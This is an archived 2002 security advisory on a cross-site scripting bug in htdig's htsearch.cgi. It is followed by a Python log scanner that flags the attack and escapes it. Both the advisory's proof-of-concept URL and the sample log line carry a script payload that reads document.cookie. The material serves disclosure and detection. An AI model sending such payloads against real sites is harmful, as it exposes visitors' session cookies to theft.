TUCoPS :: Unix :: General :: unix5490.htm



htdig cross site scripting bug
27th Jun 2002 [SBWID-5490]
COMMAND
	htdig cross site scripting bug
SYSTEMS AFFECTED
	htdig all releases up to 3.1.5 ??
PROBLEM
	Howard Yeend found that requesting:
	
	http://<webserver>/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
	
	will trigger the cross-site scripting bug.
SOLUTION
	 Update (01 July 2002)
	 ======
	
	Peter Watkins [http://www.tux.org/~peterw/] says version 3.1.6 is
	immune.
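
For administrators checking whether an unpatched htsearch has been probed, the following added example (not part of the original advisory and not htdig code) scans web-server access-log lines for htsearch requests whose decoded `words` parameter contains markup, and shows the HTML-escaped form that is safe to reflect. The log lines are constructed samples in Common Log Format; the function names and the matched script names `htsearch` and `htsearch.cgi` are assumptions.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jun/2002:10:00:00 +0000] "GET /cgi-bin/htsearch.cgi?words=unix+security HTTP/1.0" 200 5120',
    '192.0.2.11 - - [27/Jun/2002:10:00:05 +0000] "GET /cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E HTTP/1.0" 200 4876',
    '192.0.2.12 - - [27/Jun/2002:10:00:09 +0000] "GET /index.html HTTP/1.0" 200 1024',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Angle brackets only: a lone double quote is a normal phrase search.
MARKUP_CHARS = set("<>")


def suspicious_words(log_line):
    """Return decoded `words` values that contain HTML angle brackets."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    # Assumption: the CGI is installed as htsearch or htsearch.cgi.
    if not url.path.endswith(("/htsearch", "/htsearch.cgi")):
        return []
    values = parse_qs(url.query, keep_blank_values=True).get("words", [])
    return [v for v in values if MARKUP_CHARS & set(v)]


def scan(lines):
    """Map log line index -> list of (decoded value, HTML-escaped value)."""
    hits = {}
    for i, line in enumerate(lines):
        found = suspicious_words(line)
        if found:
            # html.escape() turns <, >, & and quotes into entities, so the
            # value renders as text instead of closing a tag or attribute.
            hits[i] = [(v, html.escape(v, quote=True)) for v in found]
    return hits


if __name__ == "__main__":
    for idx, pairs in scan(SAMPLE_LOG).items():
        for raw, escaped in pairs:
            print(f"line {idx}: decoded={raw!r}")
            print(f"         escaped={escaped!r}")
```
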
	
	
